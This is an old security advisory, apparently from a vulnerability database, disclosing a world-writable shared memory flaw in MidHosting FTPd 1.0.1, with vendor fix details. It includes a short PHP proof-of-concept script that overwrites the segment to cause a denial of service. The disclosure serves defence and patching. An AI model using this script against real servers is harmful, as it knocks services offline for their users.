MHFTPD vulnerability

2003-06-21T00:00:00
ID SECURITYVULNS:DOC:4721
Type securityvulns
Reporter Securityvulns
Modified 2003-06-21T00:00:00

Description

Product : MidHosting FTPd Date : 06/18/2003 Author : Frank Denis <j@42-networks.com>

------------------------[ Product description ]------------------------

MidHosting FTPd is an FTP server designed for hosting servers, based upon virtual ftpd with support for chroot, virtual users and other standard FTP features.

Home page : http://freeware.tversu.ru/mhftpd/

  ------------------------[ Vulnerability ]------------------------

mhftpd can keep track of logged users in order to disable multiple concurrent logins. The -m command-line switch enables this option.

Unfortunately, when this option is enabled, any user with shell access, CGI access, PHP access, etc. can bypass this restriction or cause a permanent denial of service.

     ------------------------[ Details ]------------------------

The list of currently logged users is kept in a public SysV shared memory segment.

However this segment and the related locking semaphore are world readable and world writable.

Non null-terminated user names will immediately cause a denial of service.

     ------------------------[ Exploit ]------------------------

Here's a trivial PHP script that triggers the flaw and makes the service unavailable.

<?php

mhftpd denial of service

define('SHMSIZE', 16384);

if (($shmid = shmop_open(ftok('/tmp', 'U'), 'w', 0777, SHMSIZE)) == -1) { die(); } shmop_write($shmid, str_repeat('A', SHMSIZE), 0);

?>

------------------------[ Affected versions ]------------------------

This issue has been verified on version 1.0.1 of MidHosting FTPd.

------------------------[ Vendor status and fixes ]------------------------

MidHosting FTPd author Ivan Stepnikov <iv@tversu.ru> has been notified on 06/17/2003 and promptly fixed the permissions on the shared memory segment.

The fixed version is available for download from the main web site.

However it looks like the version number hasn't been bumped. In order to check whether your software is vulnerable or not, please compute the MD5 digest of the tarball. The digest of the fixed one is 9b0bb31948ebbb11e9d2ef74276310df.